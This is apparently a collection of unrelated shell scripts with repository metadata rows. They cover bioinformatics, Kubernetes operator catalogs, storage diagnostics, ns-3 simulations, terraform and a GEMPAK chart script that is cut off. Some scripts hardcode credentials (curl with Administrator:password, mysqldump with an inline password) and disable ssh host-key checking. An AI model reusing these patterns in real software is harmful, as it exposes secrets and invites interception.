sha256sum $RELEASE_NAME.zip > $RELEASE_NAME.zip.sha256.txt
| true |
107872c48b63450671c6241f649e2bdc6a2bffaf | Shell | RIVM-bioinformatics/wgs_identification | /scripts/clark_runall_snakemake.sh | UTF-8 | 591 | 2.9375 | 3 | [] | no_license | #!/bin/bash
# Runs CLARK paired-end taxonomic classification for a single sample
# (invoked from the Snakemake workflow).
# NOTE(review): the original header documented "$1 = outputfile" and
# "$2 = inputfile", but the assignments below are the other way around —
# corrected here to match the code.
# $1 = inputfile  (forward/R1 FASTQ; the R2 mate path is derived from it)
# $2 = outputfile (assigned but never referenced below — confirm intent)
# $3 = monsternr  (sample number used in the CLARK output prefix)
#settings and directories
database=/mnt/db/wgs_identification/clark_db
targetfile=/mnt/db/wgs_identification/clark_db/targets.txt
inputfile=$1
outputfile=$2
monsternr=$3
threads=6
kmersize=21
mode=0
# NOTE(review): summarylogname is also assigned but never referenced here.
summarylogname="CLA_JOB_SUMMARY"
#runs CLARK for all R1 and R2 files in var "inputfile"
#creates i and j variable for the forward(R1) and reverse(R2) respectivly
R2File="R2"
i=$inputfile
# Derive the reverse-read path by substituting the first "R1" with "R2".
j=${i/R1/$R2File}
#CLARK command
CLARK -n ${threads} -k ${kmersize} -T ${targetfile} -D ${database} -P ${i} ${j} -R cla_${monsternr}_out -m ${mode}
| true |
8d2cb64964d2751b87d7a0f96c48a904a08ac98f | Shell | alphagov/paas-cf | /scripts/create_buildpacks_email.sh | UTF-8 | 1,032 | 3.703125 | 4 | [
"MIT",
"LicenseRef-scancode-proprietary-license"
] | permissive | #!/usr/bin/env bash
set -e -u -o pipefail
# Record usage of this script (path relative to $PWD) for team metrics.
echo "${0#$PWD}" >> ~/.paas-script-usage

MIN_GO_VERSION=1.11
GORAWVERSION=$(go version)
# Bug fix: the patch component used to be matched as a single digit
# ("\.[0-9]"), so e.g. go1.12.10 was captured as "1.12.1". Allow a
# multi-digit patch version.
if [[ ${GORAWVERSION} =~ ([0-9]+\.[0-9]+(\.[0-9]+)?) ]]
then
  # sort -V places the smaller version first; if the minimum is not first,
  # the detected Go is older than required.
  if [ "$(echo -e "${MIN_GO_VERSION}\n${BASH_REMATCH[1]}" | sort -V | head -n 1)" != "${MIN_GO_VERSION}" ]
  then
    echo "at least go ${MIN_GO_VERSION} is required"
    exit 1
  fi
fi

cd "$(dirname "$0")/.."
root_dir="$(pwd)"

# Optional argument: the old commit to diff buildpacks.yml against; defaults
# to the commit before the last change to config/buildpacks.yml.
ARG=${1:-}
if [ "${ARG}" == "-h" ] || [ "${ARG}" == "--help" ]
then
  echo -e "USAGE:\n  ${0} [old commit sha to diff against / --help / -h]"
  exit 0
elif [[ -n ${ARG} ]]
then
  previous_commit="${ARG}"
else
  previous_commit="$(git log --format=%H --max-count 1 --skip 1 -- "config/buildpacks.yml")"
fi

cd "${root_dir}/tools/buildpacks"
EMAIL_OUT="email-$(date "+%Y-%m-%d").txt"
# Diff the old and new buildpack manifests and render the email body.
go run email.go structs.go -old <(git show "$previous_commit:config/buildpacks.yml") -new <(git show "HEAD:config/buildpacks.yml") -out "${EMAIL_OUT}"
# (also fixes the "writen" typo in the final status message)
echo "Email content written to: $(pwd)/${EMAIL_OUT}"
| true |
9f34300e4ed15486e6cf99e4b873c1413875eb32 | Shell | joelanford/declcfg-scripts | /lib/funcs.sh | UTF-8 | 4,700 | 3.578125 | 4 | [] | no_license | #!/usr/bin/env bash
# All helpers below take a declarative-config (olm) YAML stream as a string
# argument and filter it with yq expressions. The yq programs are embedded
# in double-quoted strings with shell interpolation — keep them verbatim.
# Print the bundle blob whose .image matches exactly.
getBundleFromImage() {
    local configs=$1 image=$2
    echo "${configs}" | yq e "select(.image==\"${image}\")" -
}
# Print the olm.package blob for the named package.
getPackage() {
    local configs=$1 package=$2
    echo "${configs}" | yq e "select(.schema==\"olm.package\" and .name==\"${package}\")" -
}
# Print the olm.bundle blob matching both package and bundle name.
getBundle() {
    local configs=$1 package=$2 bundleName=$3
    echo "${configs}" | yq e "select(.schema==\"olm.bundle\" and .package==\"${package}\" and .name==\"${bundleName}\")" -
}
# Head (newest bundle) of the package's default channel.
defaultChannelHead() {
    local configs=$1 package=$2
    channelHead "${configs}" "${package}" "$(defaultChannel "${configs}" "${package}")"
}
# Head of an explicit channel: last entry of the topological sort.
channelHead() {
    local configs=$1 package=$2 channel=$3
    sortChannel "${configs}" "${package}" "${channel}" | tac | head -1
}
# The package's declared defaultChannel name.
defaultChannel() {
    local configs=$1 package=$2
    echo "${configs}" | yq eval-all "\
        select(.schema==\"olm.package\" and .name==\"${package}\") | \
        .defaultChannel \
    " -
}
# Topologically sort a channel's upgrade graph (oldest first) by feeding
# "replaces name" edge pairs to tsort.
sortChannel() {
    local configs=$1 package=$2 channel=$3
    packageEdges "${configs}" "${package}" | yq e "\
        .[] | select(.channel==\"${channel}\") | \
        .from +\" \"+.to \
    " - | tsort
}
# Emit the upgrade-graph edges for a package as a YAML list of
# {channel, from (replaces), to (bundle name)} objects, skipping bundles
# that declare no `replaces`.
packageEdges() {
    local configs=$1 package=$2
    echo "${configs}" | yq eval-all "\
        select(.schema==\"olm.bundle\" and .package==\"${package}\") | \
        { \
            \"channel\": .properties.[] | select(.type==\"olm.channel\") | .value.name, \
            \"from\": .properties.[] | select(.type==\"olm.channel\") | .value.replaces, \
            \"to\": .name \
        } | \
        select(.from != null) | [.] \
    " -
}
# Unique, sorted channel names a single bundle blob participates in.
getBundleChannels() {
    local bundle=$1
    echo "${bundle}" | yq e ".properties.[] | select(.type==\"olm.channel\") | .value.name" - | sort | uniq
}
# Bundles strictly older than the given bundle in a channel (newest first).
ancestors() {
    local configs=$1 package=$2 channel=$3 bundle=$4
    sortChannel "${configs}" "${package}" "${channel}" | tac | sed -n "/^${bundle}$/,\$p" | sed 1d
}
# Bundles strictly newer than the given bundle in a channel (oldest first).
descendents() {
    local configs=$1 package=$2 channel=$3 bundle=$4
    sortChannel "${configs}" "${package}" "${channel}" | sed -n "/^${bundle}$/,\$p" | sed 1d
}
# Delete the named bundles (whitespace-separated list in $3) from a package
# and drop any `replaces` references pointing at them; prints the resulting
# config stream.
removeBundles() {
    local configs=$1 package=$2 bundles=$3
    # Build yq "or"-chained matchers for the bundle names and for
    # .value.replaces references to them, then strip the leading " or ".
    local bundleMatchers="" replaceMatchers=""
    for b in ${bundles}; do
        bundleMatchers="$bundleMatchers or .name == \"${b}\""
        replaceMatchers="$replaceMatchers or .value.replaces == \"${b}\""
    done
    bundleMatchers="(${bundleMatchers#" or "})"
    replaceMatchers="(${replaceMatchers#" or "})"
    configs=$(echo "${configs}" | yq eval-all "[.] | del(.[] | select(.schema==\"olm.bundle\" and .package==\"${package}\" and ${bundleMatchers})) | .[] | splitDoc" -)
    configs=$(echo "${configs}" | yq eval "del(.properties[] | select(.type == \"olm.channel\" and ${replaceMatchers}) | .value.replaces )" -)
    echo "${configs}"
}
# Remove a bundle only if it is the head of every channel it belongs to AND
# the caller opted in via OVERWRITE_LATEST=true; otherwise exit 1 with a
# diagnostic on stderr.
removeIfLatest() {
    local configs=$1 bundle=$2
    local bundlePackageName=$(echo "${bundle}" | yq e '.package' -)
    local bundleName=$(echo "${bundle}" | yq e '.name' -)
    for ch in $(getBundleChannels "${bundle}"); do
        descs=$(descendents "${configs}" "${bundlePackageName}" "${ch}" "${bundleName}")
        if [[ "$descs" != "" ]]; then
            echo "Cannot overwrite \"${bundleName}\", it is not the head of channel \"${ch}\"" >&2
            exit 1
        fi
    done
    if [[ "${OVERWRITE_LATEST}" != "true" ]]; then
        echo "Cannot overwrite \"${bundleName}\", OVERWRITE_LATEST must be set to \"true\"" >&2
        exit 1
    fi
    removeBundles "${configs}" "${bundlePackageName}" "${bundleName}"
}
# Append an {type: olm.deprecated, value: {}} property to the named bundle
# of the given package; prints the modified config stream.
deprecateBundle() {
    local configs=$1 package=$2 bundle=$3
    echo "${configs}" | yq e "\
        select( .schema == \"olm.bundle\" and .package == \"${package}\" and .name == \"${bundle}\").properties += [ \
            {\"type\":\"olm.deprecated\", \"value\":{}}
        ] \
    " -
}
fmt() {
    # Render a catalog ref with opm and rewrite it on disk as one
    # <out>/<package>/index.yaml file per package.
    local configsRef=$1 out=$2
    local configs files
    configs=$(opm alpha render "$configsRef" -o json)
    files=$(echo "$configs" | jq --arg out "$out" -sc 'group_by(if .schema=="olm.package" then .name else .package end) | .[] | {filename: ($out + "/" + .[0].name + "/index.yaml"), blobs: . }')
    # Fixes: bare `read f` mangled backslashes/leading whitespace in the JSON
    # lines (use IFS= read -r), and the unquoted $(dirname $filename) broke on
    # paths containing spaces. Each iteration runs in the pipeline's subshell.
    echo "$files" | while IFS= read -r f; do
        local filename blobs
        filename=$(echo "$f" | jq -r '.filename')
        blobs=$(echo "$f" | yq e -P '.blobs[] | splitDoc' -)
        mkdir -p "$(dirname "$filename")"
        echo "$blobs" > "$filename"
    done
}
debug() {
    # Print all arguments, space-joined, to stderr.
    # Bug fix: the unquoted `echo $@` word-split and glob-expanded the
    # arguments (e.g. a literal "*" could expand to filenames).
    printf '%s\n' "$*" >&2
}
#skips() {
# local configs=$1
# local package=$2
# local bundle=$3
#
# echo "${configs}" | yq eval-all "\
# select(.schema==\"olm.bundle\" and .package==\"${package}\" and .name==\"${bundle}\") | \
# .properties.[] | \
# select(.type==\"olm.skips\") | \
# .value \
# " -
#}
| true |
ed1efd7ce8dd3b7f3ecbe566cc531a9b11b169bc | Shell | couchbaselabs/sequoia | /containers/ycsb/run.sh | UTF-8 | 223 | 2.703125 | 3 | [] | no_license | #!/bin/bash
# Usage: run.sh <host:port> <statement-file>
#   $1 - Couchbase host:port for the query (N1QL) REST service
#   $2 - file with one SQL/N1QL statement per line
# NOTE(review): credentials are hardcoded (Administrator:password) — fine for
# a test harness, but do not reuse outside the sequoia test environment.
Url=$1
Site=http://$Url/query/service
# Replay each statement against the query endpoint, echoing the exact curl
# command first for logging. Fixes: read -r so backslashes in statements
# survive, quoted "$2" redirect, and removal of a stray trailing "| true |"
# that corrupted the final line.
while IFS= read -r line; do
sql=$line
echo curl -u Administrator:password -v "$Site" -d statement="$sql"
curl -u Administrator:password -v "$Site" -d statement="$sql"
done < "$2"
1a5e120f6d731920f300772a1fee8d54609f19d9 | Shell | jhub95/ocrscantools | /do_all.sh | UTF-8 | 642 | 3.546875 | 4 | [] | no_license | #!/bin/bash
# Sync scans from the Pi, convert every book directory under /depo/scans,
# sync back, and report undone books — all under an exclusive flock so only
# one instance runs at a time.
DIR=$(dirname "$0")
(
	# Lock to make sure that only 1 process can run at the same time
	flock -n 9 || exit 1
	"$DIR"/sync_pi.sh
	cd /depo/scans || exit 1
	for i in */; do
		echo "About to process $i..."
		# Bug fix: if `cd $i` failed, the converter used to run in the
		# parent directory and the following `cd ..` walked up the tree.
		cd "$i" || { echo "Command failed: $i"; continue; }
		if ! /home/bookscanner/scantools/convert_book.pl pdf text html; then #clean
			echo "Command failed: $i"
		fi
		cd ..
	done
	"$DIR"/sync_pi.sh
	# Human-readable output last
	"$DIR"/check_undone_books.sh
) 9> /tmp/convert_book_lock
# Clean up lock file to allow other users to run the script
if [ "$?" = 0 ]; then
	rm /tmp/convert_book_lock
fi
| true |
5a03bbad9524419b147ea22cd2047001820dcb79 | Shell | haroldTlan/cloud-beego | /python/Yan/storage/collect_diagnosis.sh | UTF-8 | 1,120 | 2.953125 | 3 | [] | no_license | #!/bin/bash
# Collect a support/diagnosis bundle for a Speedio storage appliance:
# database dump, system logs, hardware info and the license key, packed into
# $ZSTOR_PATH/diagnosis.tar.gz. Must run as root (reads /root, /var/log).
ZSTOR_PATH=/home/zonion
DIAGNOSIS_PATH=/home/zonion/diagnosis
# Start from a clean staging directory.
rm -rf $DIAGNOSIS_PATH
mkdir $DIAGNOSIS_PATH
mysqldump -uspeedio -ppasswd speediodb > $DIAGNOSIS_PATH/speediodb.sql
bash /home/zonion/speedio/scripts/check_info.sh > /home/zonion/recent_info
# Copy raw logs only if /var/log (MB) fits in half the free space reported on
# the second df line; otherwise run the dfck.sh compaction path and take the
# pre-compacted files from /var/logfile instead.
logsize=`du -sm /var/log | awk '{print $1}'`
sda5size=`df -m | awk '{print $4}' | head -2 | tail -1`
size=`expr $sda5size / 2`
if [ $size -gt $logsize ];then
    cp /var/log/core* $DIAGNOSIS_PATH
    cp /var/log/syslog* $DIAGNOSIS_PATH
    cp /var/log/kern* $DIAGNOSIS_PATH
    cp /var/log/messages* $DIAGNOSIS_PATH
else
    bash /home/zonion/speedio/scripts/dfck.sh 0
    mv /var/logfile/* $DIAGNOSIS_PATH
fi
cp /var/log/boot.log $DIAGNOSIS_PATH
cp /var/log/authlog.worningip $DIAGNOSIS_PATH
cp /home/zonion/recent_info $DIAGNOSIS_PATH
cp /root/hardware_info $DIAGNOSIS_PATH
cp /var/log/speedio.* $DIAGNOSIS_PATH
cp $ZSTOR_PATH/license/key $DIAGNOSIS_PATH
cd $ZSTOR_PATH
# NOTE(review): d (timestamp) and n (hardware-id line) are computed but never
# used below — presumably intended for the archive name; confirm before
# removing them.
d=`date +%Y-%m-%d_%H-%M`
n=`cat /root/hardware_info | grep 010100 | tail -1`
tar -czvf diagnosis.tar.gz diagnosis
rm -rf $DIAGNOSIS_PATH
| true |
a70b63d8282ab85f33ade4c18430a18b26cd0d64 | Shell | Bondzio/AUR | /mist/PKGBUILD | UTF-8 | 1,748 | 2.984375 | 3 | [] | no_license | # Maintainer: Andy Weidenbaum <archbaum@gmail.com>
# Arch Linux PKGBUILD for Mist, the Ethereum "Ether Browser".
pkgname=mist
pkgver=20150509
pkgrel=1
pkgdesc="Ether Browser for Ethereum"
arch=('i686' 'x86_64')
depends=('gmp'
         'leveldb'
         'qt5-base'
         'qt5-declarative'
         'qt5-quickcontrols'
         'qt5-webengine'
         'readline')
makedepends=('gcc'
             'git'
             'go'
             'godep'
             'make'
             'mercurial')
optdepends=('go-ethereum: Ethereum Go developer client (CLI)')
groups=('ethereum')
url="https://github.com/ethereum/go-ethereum"
license=('GPL')
options=('!strip' '!emptydirs')
install=mist.install
# VCS-style version: today's date (makepkg re-runs this to refresh pkgver).
pkgver() {
  date +%Y%m%d
}
# Fetch go-ethereum into a GOPATH rooted at $srcdir, switch to the develop
# branch, restore pinned deps with godep, and build the mist command.
build() {
  msg2 'Building...'
  export GOPATH="$srcdir"
  go get -d github.com/ethereum/go-ethereum/...
  cd "$srcdir/src/github.com/ethereum/go-ethereum" && git checkout develop
  godep restore
  cd ./cmd/mist && go install
}
# Install the Mist assets under /usr/share/mist, the binaries under /usr/bin,
# and strip VCS metadata from the packaged tree.
package() {
  msg2 'Installing Mist assets...'
  install -dm 755 "$pkgdir/usr/share/mist/src"
  for _lib in `find "$srcdir/src" -mindepth 1 -maxdepth 1 -printf '%f\n'`; do
    cp -dpr --no-preserve=ownership "$srcdir/src/$_lib" "$pkgdir/usr/share/mist/src/$_lib"
  done
  mv "$pkgdir/usr/share/mist/src/github.com/ethereum/go-ethereum/cmd/mist/assets"/* \
     "$pkgdir/usr/share/mist" && rm -rf "$pkgdir/usr/share/mist/src"
  msg2 'Installing Mist binary...'
  for _bin in `find "$srcdir/bin" -mindepth 1 -maxdepth 1 -type f -printf '%f\n'`; do
    install -Dm 755 "$srcdir/bin/$_bin" "$pkgdir/usr/bin/$_bin"
  done
  msg2 'Cleaning up pkgdir...'
  find "$pkgdir" -type d -name .git -exec rm -r '{}' +
  find "$pkgdir" -type f -name .gitignore -exec rm -r '{}' +
  find "$pkgdir" -type d -name .hg -exec rm -r '{}' +
  find "$pkgdir" -type f -name .hgignore -exec rm -r '{}' +
}
| true |
35565a35d48043e5ba20cf155e9d7283dda16252 | Shell | whlzdy/firmware | /OneCloud/script/server/control/funcs.sh | UTF-8 | 2,499 | 3.890625 | 4 | [] | no_license | #!/bin/bash
# Shared configuration for the server control helpers below.
# Rolling log location and rotation threshold (10 MiB), plus the two status
# files written by startWriteStatus / stopWriteStatus.
logpath="/opt/onecloud/script/server/log"
logfile="${logpath}/running.log"
maxsize=10485760
startstatusfile="/opt/onecloud/script/server/control/start_status.tmp"
stopstatusfile="/opt/onecloud/script/server/control/stop_status.tmp"
function checkConnection {
    # Echo the exit status of a 3-packet quiet ping: 0 when the host answers,
    # ping's non-zero status otherwise.
    ip="${1}"
    local rc=0
    ping -q -c3 ${ip} > /dev/null 2>&1 || rc=$?
    echo "${rc}"
}
function checkIscsiConnection {
    # Probe the storage endpoint over HTTP (5s timeout) instead of the older
    # two-host ping approach kept below as commented-out history.
    # Echoes: 0 when the page is reachable and does NOT contain "404",
    # 1 when "404" appears in the response, otherwise curl's exit status.
    ip1="${1}"
    #ip2="${2}"
    #ping -q -c3 ${ip1} > /dev/null 2>&1
    #result1=$?
    #ping -q -c3 ${ip2} > /dev/null 2>&1
    #resutl2=$?
    #if [ "${result1}" -eq "0" ] && [ "${result2}" -eq "0" ]
    #then
    #	echo "0"
    #else
    #	log "CONNECT_ISCSI" "FAIL" "we have check iscsi and result is ${result1} and ${result2}!"
    #	echo "1"
    #fi
    out=`curl -m 5 http://${ip1}/v2/index.html`
    result="$?"
    if [ "${result}" -eq "0" ]
    then
        # grep on the (word-split) body; empty match means no 404 marker.
        notfound=`echo ${out} | grep 404`
        if [ -z "${notfound}" ]
        then
            echo "0"
        else
            echo "1"
        fi
    else
        echo "${result}"
    fi
}
# log <tag> <status> <message>
# Append a timestamped entry to ${logfile}, rotating the file aside
# (running<timestamp>.log) once it exceeds ${maxsize} bytes.
# Fixes: the original called stat unconditionally, which errored on the
# very first call when ${logfile} did not exist yet; cp -f + rm -f is
# replaced by a single mv; expansions are quoted.
function log {
    # max size is 10M (see ${maxsize}); treat a missing file as size 0.
    local size=0
    if [ -f "${logfile}" ]; then
        size="$(stat --format=%s "${logfile}")"
    fi
    if [ "${size}" -gt "${maxsize}" ]
    then
        mv -f "${logfile}" "${logpath}/running$(date +'%Y-%m-%d-%H-%M-%S').log"
    fi
    echo "`date` ${1} ${2} ${3}" >> "${logfile}"
}
# checkAppStatus <ip> <script> <state>
# Run a status-check script on the remote host as user "clouder"
# (30 s connect timeout, host-key checking disabled) and echo whatever
# the remote script prints.
function checkAppStatus {
ip="${1}"
script="${2}"
state="${3}"
result=$(ssh -o ConnectTimeout=30 -o StrictHostKeyChecking=no clouder@${ip} "/bin/bash ${script} ${state}")
echo "$result"
}
# stopApp <ip> <script>
# Launch the application stop script on the remote host in the background
# (fire-and-forget: output is discarded and no exit status is collected).
function stopApp {
ip="${1}"
script="${2}"
ssh -o ConnectTimeout=30 -o StrictHostKeyChecking=no clouder@${ip} "/bin/bash ${script} > /dev/null 2>&1 &"
}
# startApp <ip> <script>
# Launch the application start script on the remote host in the background.
# NOTE(review): the body is identical to stopApp; only the script argument
# passed by the call sites differs.
function startApp {
ip="${1}"
script="${2}"
ssh -o ConnectTimeout=30 -o StrictHostKeyChecking=no clouder@${ip} "/bin/bash ${script} > /dev/null 2>&1 &"
}
# shutdownSystemVm <systemvm-ip>
# Power off a system VM via a remote "shutdown -h now" (connects as the
# default ssh user, unlike the clouder@ app helpers above).
function shutdownSystemVm {
systemvmip="${1}"
ssh -o ConnectTimeout=30 -o StrictHostKeyChecking=no ${systemvmip} "shutdown -h now > /dev/null 2>&1 &"
}
# startWriteStatus <a> <b> <c>
# Overwrite the start-status file with a single line of the form
# "<epoch-seconds> <a> <b> <c>".
function startWriteStatus {
    local stamp
    stamp="$(date +%s)"
    printf '%s %s %s %s\n' "${stamp}" "${1}" "${2}" "${3}" > "${startstatusfile}"
}
# stopWriteStatus <a> <b> <c>
# Overwrite the stop-status file with a single line of the form
# "<epoch-seconds> <a> <b> <c>".
function stopWriteStatus {
    local stamp
    stamp="$(date +%s)"
    printf '%s %s %s %s\n' "${stamp}" "${1}" "${2}" "${3}" > "${stopstatusfile}"
}
# getType <property-filename>
# Map a device property file name to its numeric device-type code:
#   switch.property   -> 1
#   firewall.property -> 2
#   storage.property  -> 3
#   router.property   -> 4
#   ups.property      -> 5
#   anything else     -> 0
# Fix: the original compared "$(unknown)" (which invokes a nonexistent
# command and expands to the empty string) instead of "${filename}", so
# every input fell through to "0".
function getType {
    local filename="${1}"
    case "${filename}" in
        firewall.property) echo "2" ;;
        router.property)   echo "4" ;;
        storage.property)  echo "3" ;;
        switch.property)   echo "1" ;;
        ups.property)      echo "5" ;;
        *)                 echo "0" ;;
    esac
}
| true |
44de4917bfebf203620ae5ecf76d7ae2079fd9a4 | Shell | sjenning/run-monitor-chart | /show-chart.sh | UTF-8 | 232 | 2.875 | 3 | [] | no_license | #!/bin/bash
# Build the run-monitor-chart tool, render the chart for the given log
# file, then serve the current directory over HTTP and open a browser.
set -eux

if [ "$#" -ne 1 ]; then
    # Usage errors belong on stderr.
    echo "usage: $0 run-monitor-log-file" >&2
    exit 1
fi

go build .
# Quote the argument so log paths containing spaces work.
./run-monitor-chart "$1"

# Serve the generated chart in the background; stop the server on
# Ctrl-C/TERM, then block until it exits.
python3 -m http.server &
PID=$!
trap 'kill "$PID"' SIGINT SIGTERM
xdg-open "http://localhost:8000"
wait
5f44d1d0a33c9a02ef189a62f7534c0e75020f70 | Shell | singi/QBDI | /docker/travis_linux/gtest.sh | UTF-8 | 1,120 | 3.5 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/bash
set -e
set -x

BASEDIR=$(cd $(dirname "$0") && pwd -P)
GITDIR=$(git rev-parse --show-toplevel)

# Skip the slow docker build when gtest headers and libraries were
# already extracted for this platform.
if [[ -n "$(find "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/lib" -type f -print -quit)" &&
      -n "$(find "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/include" -type f -print -quit)" ]]; then
    exit 0;
fi

# NOTE(review): the same directory is created twice; presumably one of
# these was meant for a different path — confirm before changing.
mkdir -p "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/"
mkdir -p "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/"

# Pick the base image matching the target platform.
if [[ "linux-X86_64" = "${QBDI_PLATFORM}" ]]; then
    docker build "${GITDIR}" -t qbdi_build:base -f "${BASEDIR}/base_X86_64.dockerfile"
elif [[ "linux-X86" = "${QBDI_PLATFORM}" ]]; then
    docker build "${GITDIR}" -t qbdi_build:base -f "${BASEDIR}/base_X86.dockerfile"
else
    echo "Unknown QBDI_PLATFORM : ${QBDI_PLATFORM}"
    exit 1
fi

# Build gtest inside a container, then copy the artifacts out of a
# temporary container instance.
docker build "${GITDIR}" -t qbdi_build:gtest -f "${BASEDIR}/gtest.dockerfile"

docker create --name gtest qbdi_build:gtest
docker cp "gtest:/home/docker/qbdi/deps/gtest/${QBDI_PLATFORM}/include" "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/"
docker cp "gtest:/home/docker/qbdi/deps/gtest/${QBDI_PLATFORM}/lib" "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/"
docker rm gtest
| true |
6052ad2b3c46f396ebe5e41677a575328c06fe12 | Shell | ugoviti/izdock | /osync/filesystem/etc/runit/services/rsyncd/run | UTF-8 | 383 | 3.046875 | 3 | [] | no_license | #!/usr/bin/env sh
# runit service script: run rsyncd in the foreground under the supervisor.
set -eu
exec 2>&1
#source /env

# Config file path, overridable via the cfgfile environment variable.
: ${cfgfile:="/etc/rsyncd.conf"}
RSYNC_OPTS=""
# NOTE(review): RSYNC_OPTS and pidfile are defined but not used below.
daemon=rsyncd
command="/usr/bin/rsync"
pidfile="/run/$daemon.pid"
# Check if command is executable or not
test -x ${command} || exit 0
#trap "pkill -SIGHUP runsvdir" SIGTERM SIGINT
echo "Starting '${command}' with PID: $$"
# --no-detach keeps rsync in the foreground so runit can supervise it.
exec ${command} --daemon --no-detach --config=$cfgfile
| true |
b0777c8ea094a3ace301c0a0a1b32a0d3e82e978 | Shell | WarriorBeat/WarriorBeatApp | /fastlane/scripts/travis.sh | UTF-8 | 417 | 3.328125 | 3 | [] | no_license | #!/usr/bin/env bash
# Setup Travis CI
# Write per-environment dotenv files under the directory given as $1,
# exporting NODE_PATH and API_DEV from the CI environment into each.
ENV_DIR=$1
ENV_MAIN="$ENV_DIR/.env"
ENV_DEV="$ENV_DIR/.env.dev"
ENV_STAGING="$ENV_DIR/.env.staging"
ENV_RELEASE="$ENV_DIR/.env.release"
# Environment-specific files (the main .env is only touched, not populated).
ENVIRONS=($ENV_DEV $ENV_STAGING $ENV_RELEASE)
# Create Env Files
touch $ENV_MAIN
for file in "${ENVIRONS[@]}"; do
    # ">" truncates first, so each run rewrites the file from scratch.
    echo "export NODE_PATH=${NODE_PATH}" > $file
    echo "export API_DEV=${API_DEV}" >> $file
    cat $file
done
echo $NODE_PATH | true |
705fd19176b7930a9e20cd735e894ef6e7b7505b | Shell | juliapowen/IBICcode | /wrapper_qsub_submitEDItractography | UTF-8 | 554 | 2.921875 | 3 | [] | no_license | #!/bin/bash
# Submit EDI tractography jobs for every subject directory matching
# 10906* under <rootdir> whose probtrackx output is still incomplete.
# Arguments:
#   $1 rootdir     project root holding the subject directories
#   $2 filelist    NOTE(review): assigned but never used below — confirm
#   $3 atlas       ("" for DK, "a2009s" for DS, "fxcn" for FXCN)
#   $4 bedpostdir  e.g. bedpostx_b1000
#   $5 edge_list   file with one tract/edge per line
rootdir=$1
filelist=$2
atlas=$3 #("" for DK, "a2009s" for DS, "fxcn" for FXCN)
bedpostdir=$4 #bedpostx_b1000
edge_list=$5
cd $rootdir
for subj in ` ls -d 10906* `
do
echo $subj
# Count result volumes already produced for this subject.
# NOTE(review): "grep *.nii.gz" is an unquoted glob — likely meant
# grep '.nii.gz'; verify before relying on the count.
n=` ls $rootdir/$subj/session1/EDI/PBTKresults_EDI2/* | grep *.nii.gz | wc -l `
echo $n
# One output is expected per edge listed in the edge file.
nlines=` cat $edge_list | wc -l `
echo $nlines
# Resubmit only when fewer results than edges exist.
if [ $n -lt $nlines ]
then
/mnt/home/jpowen/TractographyCode/IBICcode/qsub_submitEDItractography $rootdir allvols$atlas PBTKresults_EDI2 \
terminationmask$atlas.nii.gz bs.nii.gz $bedpostdir $subj $edge_list
fi
done
| true |
054273ba8f563d3ee5242d9f288ab8f5d56383ed | Shell | RandelSouza/Analise_New_Reno_Vegas_Veno | /repos/ns-3-allinone/ns-3-dev/scratch/topology_halteres/halteres.sh | UTF-8 | 1,192 | 3.265625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Sweep TCP variant, link error rate, node count and data rate over the
# ns-3 "halteres" (dumbbell) topology, then archive the traces per run.

# TCP congestion-control variant: 1 = New Reno, 2 = Vegas, 3 = Veno
typeTCP=( 1 2 3 )
# Packet error rates to simulate
errorRate=( 0.2 0.5 )
# Node counts for the dumbbell topology
numberNodes=( 9 36 64 )
# Link data rates in Mbps
dataRate=( 10 100 )

# Export so the ns-3 child process actually sees the logging setting
# (the original assignment was not exported, so waf never received it).
export NS_LOG=halteres=info

for tcp in "${typeTCP[@]}"
do
	for error in "${errorRate[@]}"
	do
		for node in "${numberNodes[@]}"
		do
			for rate in "${dataRate[@]}"
			do
				echo "$tcp, $error, $node, $rate"
				# Leaves per side: node^2 / 2.  POSIX $(( )) replaces the
				# deprecated $[ ] arithmetic form.
				nodesQuantity=$(( node * node / 2 ))
				./../../waf --run "halteres --typeTCP=$tcp --errorRate=$error --nLeftLeaf=$nodesQuantity --nRightLeaf=$nodesQuantity --dataRate=$rate"
				# Archive this run's traces into per-format directories.
				outdir="halteres-$tcp-$error-$nodesQuantity-$rate"
				mkdir -p "$outdir" "$outdir-xml" "$outdir-tr"
				mv ../../*.pcap "$outdir"
				mv ../../*.tr "$outdir-tr"
				mv ../../*.xml "$outdir-xml"
			done
		done
	done
done
| true |
d8f9d3a62f4002703cf88048c97e2bfeb60b43c7 | Shell | jmyounker/dot.files | /bin/tf-apply | UTF-8 | 403 | 3.65625 | 4 | [] | no_license | #!/usr/bin/env bash
# Apply the most recent terraform plan file from ./.plans, passing any
# extra arguments through to `terraform apply`.
TF_PLAN_DIR="${PWD}/.plans"
if [ ! -e "${TF_PLAN_DIR}" ]; then
  echo "no plans available" >&2
  exit 1
fi
# Plan file names sort lexicographically, so the last one is the newest.
PLAN=$(ls "${TF_PLAN_DIR}" | sort | tail -1)
# Empty listing means no plan files; -z replaces the original
# echo|wc|awk character-count round trip.
if [ -z "${PLAN}" ]; then
  echo "no plans available" >&2
  exit 1
fi
echo "executing plan '$TF_PLAN_DIR/$PLAN'" >&2
exec terraform apply "$TF_PLAN_DIR/$PLAN" "$@"
| true |
f9971a5f948af8dd259295cdc4b8b91632ab5734 | Shell | lgannoaa/global-workflow | /gempak/ush/gempak_gfs_f00_gif.sh | UTF-8 | 11,629 | 2.90625 | 3 | [] | no_license | #!/bin/sh
#########################################################################
#
#   Script:  gempak_gfs_f00_gif.sh
#
#   This scripts creates GEMPAK .gif images of 00HR/Analysis fields from
#   GFS model output for archiving at NCDC.
#
#
#   History:   Ralph Jones     02/16/2005   JIF original version.
#   History:   Steve Lilly     04/30/2008   Change font size of the Titles
#                                           from .8 to a larger size (1 or 2)
#
#
#########################################################################
msg=" Make GEMPAK GIFS utility"
postmsg "$jlogfile" "$msg"
set -x
# Plot geometry shared by all charts: map area, lat/lon grid, image size.
MAPAREA="normal"
LATVAL="1/1/1/1/5;5"
pixels="1728;1472"
cp $FIXgempak/coltbl.spc coltbl.xwp
#################################################################
#               ANALYSIS CHARTS                                 #
#################################################################
# Create time stamp (bottom) label
echo 0000${PDY}${cyc} > dates
export FORT55="title.output"
# $WEBTITLE < dates
${UTILgfs}/exec/webtitle < dates
export TITLE=`cat title.output`
echo "\n\n TITLE = $TITLE \n"
# Define labels and file names for analysis charts
